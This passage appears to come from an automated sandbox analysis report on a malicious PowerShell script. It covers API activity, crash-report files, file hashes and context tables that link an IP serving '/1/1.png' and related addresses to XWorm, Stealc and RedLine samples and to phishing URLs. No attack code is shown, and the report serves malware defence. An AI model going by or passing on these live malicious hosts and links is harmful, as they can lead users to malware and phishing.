                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 3916 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                02:15:16API Interceptor42x Sleep call for process: powershell.exe modified
                                02:15:20API Interceptor5220099x Sleep call for process: RegSvcs.exe modified
                                02:15:22API Interceptor1x Sleep call for process: wermgr.exe modified
                                02:17:54API Interceptor1x Sleep call for process: WerFault.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                92.255.57.155anyrunsample.ps1Get hashmaliciousUnknownBrowse
                                • 92.255.57.155/1/1.png
                                https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                • 92.255.57.155/1/1.png

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                s-part-0035.t-0009.t-msedge.netvsuotNfeN7.ps1Get hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                • 13.107.246.63
                                http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                https://pdf-ezy.com/pdf-ezy.exeGet hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0ZGet hashmaliciousHTMLPhisherBrowse
                                • 13.107.246.63
                                https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                http://office.yacivt.com/wriEcFSZGet hashmaliciousHTMLPhisherBrowse
                                • 13.107.246.63
                                https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                file.exeGet hashmaliciousRemcosBrowse
                                • 13.107.246.63
                                nsdksetup.dllGet hashmaliciousUnknownBrowse
                                • 13.107.246.63

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                TELSPRUMiGFg375KJ.exeGet hashmaliciousXWormBrowse
                                • 92.255.57.155
                                anyrunsample.ps1Get hashmaliciousUnknownBrowse
                                • 92.255.57.155
                                sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                • 92.255.57.75
                                ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                • 92.255.57.75
                                fa20b849ebe7c53d59f3ed0fcfac8445ea08e7296af5a.exeGet hashmaliciousStealcBrowse
                                • 92.255.57.89
                                LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                • 92.255.57.89
                                SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                • 92.255.57.89
                                mMgFHz9PdG.exeGet hashmaliciousStealcBrowse
                                • 92.255.57.89
                                vCZfRWB1kd.exeGet hashmaliciousStealcBrowse
                                • 92.255.57.89
                                1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exeGet hashmaliciousStealcBrowse
                                • 92.255.57.89

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_6ffd24152b5e9a3a3eb1fb64c4ad5c89541278d_74bcc9ed_94285313-b94c-4073-9f7e-2ffb49a5f652\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):1.214016822980835
                                Encrypted:false
                                SSDEEP:192:VtSC0k8Qfqz0BU/Sa6dgt0GsNzuiFUZ24IO8a9:VsCOQfVBU/Sa/tvezuiFUY4IO8a9
                                MD5:25E9D60FAB5D18D7237F89D51A41D2FD
                                SHA1:041F249ECF3A0F1C7ED0E27DD7A793C57675210E
                                SHA-256:1CEFB948D52CD505F98623DD945306EEF8302097DFC208A9A882DA9D6CCBAF3E
                                SHA-512:E49C90492009FFDB71FDA879CF483722E3D11DC425439D3D59FE346C80D58B5F21C0CE1B950487991E8AC84227AD185E7DD698C888F830EB1EF993BBA2C72828
                                Malicious:false
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.7.9.8.7.2.2.1.0.8.9.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.7.9.8.7.2.7.5.7.7.7.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.2.8.5.3.1.3.-.b.9.4.c.-.4.0.7.3.-.9.f.7.e.-.2.f.f.b.4.9.a.5.f.6.5.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.3.7.9.9.a.2.-.a.a.7.f.-.4.4.c.3.-.a.8.e.e.-.d.a.7.e.4.d.4.b.b.9.2.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.0.4.0.-.0.0.0.1.-.0.0.1.5.-.7.0.1.d.-.e.9.9.6.1.c.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.7.

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_cff3fccfaef89fe97e70f334411924bd667e9abb_00000000_4f5b0cd0-1154-4336-928a-04ca86f8e297\Report.wer

                                Download File
                                Process:C:\Windows\System32\wermgr.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.5320809411177977
                                Encrypted:false
                                SSDEEP:96:TcrjFNgj/rxYidCRH3Uje0e35/3ooLF1QXIGZAX/d5FMT2SlPkpXmTAJf/VXT5NH:+S/mGCR30m8AzuiFRZ24lO8
                                MD5:5B1F98FEF402E21A5AF07A7EC40EC89B
                                SHA1:5BCA4441FC2A562D8AC51F8571C74301A79CE1EF
                                SHA-256:A8888C92D02D594E7D0376A02D3B12488879586993086C1FA0C8B7E5BC6A166C
                                SHA-512:4AEEC184752BAFB735BF2A1F6E6B667A4FFD5E28FC6E36B782D3ECBEC4B124C99BE7585756FD733691376518043FB57698A161F2A850512A9812DBC004198D47
                                Malicious:false
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.7.9.7.6.5.3.5.2.3.1.1.1.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.7.9.7.1.7.6.0.7.4.4.2.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.5.b.0.c.d.0.-.1.1.5.4.-.4.3.3.6.-.9.2.8.a.-.0.4.c.a.8.6.f.8.e.2.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.7.9.7.8.-.f.9.9.4.1.c.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER517A.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 07:17:52 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):363027
                                Entropy (8bit):3.4615777568715096
                                Encrypted:false
                                SSDEEP:3072:dq8IpLOLTgLP1D6aEefXS0J0sHJt72SU4uEqey5yA:dqeTgLP1maE2i0SE7PU4DyIA
                                MD5:9AA8A7A1358285ABE36FEA4A29CA24C9
                                SHA1:13FB2D86747C94DBB3DFEEB2CD0B8FCB98D87BDE
                                SHA-256:6760A69EA2F1A6529FCD6CADE52A6B4C19990F29E98B54D2A08291E291E4555D
                                SHA-512:E16D6BA62A306E0F1BB7EF2EA4996ED50F267B209AA56535AA4C48FC64D10E37432727E9AED5C6A83F0BA953E8CDE0DFFAFA038BCC88D1AD7DE71ABE4B60F361
                                Malicious:false
                                Reputation:low
                                Preview:MDMP..a..... ....... wbg........................<...........$....)......T*...m..........`.......8...........T............E..+D...........*...........+..............................................................................eJ.......,......GenuineIntel............T.......@....vbg....k........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER52D3.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8352
                                Entropy (8bit):3.6897445483948594
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJGj6S7B6Y/6STgmfZ86LYprn89byMsf1dGm:R6lXJi6o6YySTgmfO6Ldyff1l
                                MD5:A7675020FB9A61685A9D3EDCB7406654
                                SHA1:03FC2EBA2C9D3FD94291961C9F3A28A54EE4863F
                                SHA-256:5B978F6347C77F81142B0EDD6E80F5B5B2B53DDE892C2F77B9DEB8AA9514ADDB
                                SHA-512:60CFDB45BAB21265199031E4EB7A1DD9A01E50BF05065D5A56946B2CFAD705815F0B2FC2765A73ECA89D25B414E59F9074F38F27CADF63BABC681AE1DB4DE5E8
                                Malicious:false
                                Reputation:low
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.<./.P.i.d.>.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER5303.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4728
                                Entropy (8bit):4.441639343111392
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsOJg77aI9alWpW8VYbYm8M4J3cF9+q8vYdmDI2rd:uIjfEI7IU7VLJ0KKmDI2rd
                                MD5:D73316DCCA6A8EBB1DE528D23349FC6F
                                SHA1:6D26AEE937F4918550FE0CB05390FDFECE2C643C
                                SHA-256:9AD0D2AD17817B4E68B2365FD16817C5AEC4E06F4C84C2A85FE186B8D00A4E16
                                SHA-512:AF0A072D1D017DF758FA4C32A214A8963D770569584B35670996E1F9CF43E10E1E1541CC711D3B43A0DF078F53BA49327DAEE6645D299358737544497235A85E
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636380" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERF402.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\System32\wermgr.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):7286
                                Entropy (8bit):3.7372502766796414
                                Encrypted:false
                                SSDEEP:96:RSIU6o7wVetblbQ956Y2P7purgmfHNpX6PUZV6l5aMTc9Rm:R6l7wVeJlbO6Y2DpurgmftYULYpgTm
                                MD5:1A96410197BE3A19726CB4F5E7AB3130
                                SHA1:D81D2F9059FD15C1071FF81F04F15B2FA1F64129
                                SHA-256:D8E88BD86E5AC314A7598BEAF8678ED5D2D398D1FA743142BE2440D9370ECA97
                                SHA-512:94D7A9407B5F4096A68D583F7D9E1C6A80063A4F5C135285EB483837398FF689FFEC9B01D684DB309A7FE9D0BB3D686E96E1747C635F6FC18798EB72E2E93A8D
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.1.6.<./.P.i.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERF441.tmp.xml

                                Download File
                                Process:C:\Windows\System32\wermgr.exe
                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4905
                                Entropy (8bit):4.690046763747149
                                Encrypted:false
                                SSDEEP:96:uIjf+I71U7VSJFKloFevAFEJLWTzFevAFH2ufld:uISY1U7g455Ksjuf7
                                MD5:A7549B4697FE51392736FDB488968E9D
                                SHA1:8958A99D4D320E0470F63C745EE5F65B14CE4E0E
                                SHA-256:0296DDD2B29E4D346A4A7E09C37BB4F09C17BB14FBFF31331063D0463246D0A3
                                SHA-512:B9EB0A5850AF3F75BF01BEC9F3A2F3FBA39261D420CD85A9B05667F01277FEB2F95BCA7C7E316504E80C2E32DD5A26EC09C30FC215955DC403BD525EF571A981
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1628158735648508
                                Encrypted:false
                                SSDEEP:3:Nllluldhz/lL:NllU
                                MD5:03744CE5681CB7F5E53A02F19FA22067
                                SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                Malicious:false
                                Preview:@...e.................................L..............@..........

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdqhjjzm.otz.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmc0542d.bhs.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6224
                                Entropy (8bit):3.7345489224225887
                                Encrypted:false
                                SSDEEP:48:nfD6latO0F3CyFU2UcWukvhkvklCywe30gHClHJCSogZomX0gHCl3CSogZoS1:7pF3CxTqkvhkvCCtngHCHHAgHClHF
                                MD5:1B56B8099DABF7295EAA140C8A6B414B
                                SHA1:C4FAF841452627085C650A62BB688EC158010B2C
                                SHA-256:2A5A64762879EF86A639FF1F21DF27FD61F62AD0A6B30258CB696480CB5BB7E0
                                SHA-512:9ED27353E1201481DDDDE51F7C572733D1A0DA5EF4F94E0F9E65B1981B443904DF565600A6503DC24BDD92A7ABB161FE1BBAC59F09AA5CADC3875D0C999B8D54
                                Malicious:false
                                Preview:...................................FL..................F.".. ...J.S....r...Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....3]..Q....!..Q......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.9...........................^.A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......EW<2.Y.9..../.....................}.".R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.9....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.9....2.....................O)..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.9....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.9....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y.9....u...........

                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TS970Z6G01CTAWEXDQFT.temp

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6224
                                Entropy (8bit):3.7345489224225887
                                Encrypted:false
                                SSDEEP:48:nfD6latO0F3CyFU2UcWukvhkvklCywe30gHClHJCSogZomX0gHCl3CSogZoS1:7pF3CxTqkvhkvCCtngHCHHAgHClHF
                                MD5:1B56B8099DABF7295EAA140C8A6B414B
                                SHA1:C4FAF841452627085C650A62BB688EC158010B2C
                                SHA-256:2A5A64762879EF86A639FF1F21DF27FD61F62AD0A6B30258CB696480CB5BB7E0
                                SHA-512:9ED27353E1201481DDDDE51F7C572733D1A0DA5EF4F94E0F9E65B1981B443904DF565600A6503DC24BDD92A7ABB161FE1BBAC59F09AA5CADC3875D0C999B8D54
                                Malicious:false
                                Preview:...................................FL..................F.".. ...J.S....r...Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....3]..Q....!..Q......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.9...........................^.A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......EW<2.Y.9..../.....................}.".R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y.9....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y.9....2.....................O)..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y.9....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y.9....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y.9....u...........

                                C:\Windows\appcompat\Programs\Amcache.hve

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.4730538599003795
                                Encrypted:false
                                SSDEEP:6144:WzZfpi6ceLPx9skLmb0fuZWSP3aJG8nAgeiJRMMhA2zX4WABluuNxjDH5S:4ZHtuZWOKnMM6bFprj4
                                MD5:4E843D1AA1776B60EE98B36BA946A3BA
                                SHA1:B1976D14BD141A173418806046703FD83105F459
                                SHA-256:07839E03D48A2C5F88011D1D0E4F87051E25C51395FF0580A6EE17FA576E1CF1
                                SHA-512:C05EF4418BF8820CFF9FC6553D02858FA8AC92D004BFBBEBFA6902FD42FD20B8F0DE48DCFDFE493140F8B1ECD4CB823F61E360011285734E7FE955869CF63B7B
                                Malicious:false
                                Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm~...Q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:ASCII text, with very long lines (65463), with CRLF line terminators
                                Entropy (8bit):5.159109254828783
                                TrID:
                                  File name:NLXwvLjXPh.ps1
                                  File size:341'157 bytes
                                  MD5:665d34b878bf82d6b6078c1a20cda896
                                  SHA1:a1c03b8df6b114c5a9b557316868f06a2816f4c0
                                  SHA256:e02595a8630c7da338e486f3502ecde5cac8940ede0c5fb058aa1d02f6150859
                                  SHA512:2a9c9a14fb23d685ba4f3eae00d9b0a5de50965a00fd8dcddfb0d73c9cb84f24c5ff84fd12dfd4323287bf71f6c72f695e447a94db463b1b11dc1685a7045951
                                  SSDEEP:6144:3K4rMAa8DAz7OGxuerPkwn4Je1Z0e9JCrSKQ81J7lHH7urZyrnpGYPoHdolDeZln:yfyNcJrk6TK+
                                  TLSH:BA743C318805B92F8EEF1F87B5402FD37C78217BDF551018A88F16B96A68238597AF74
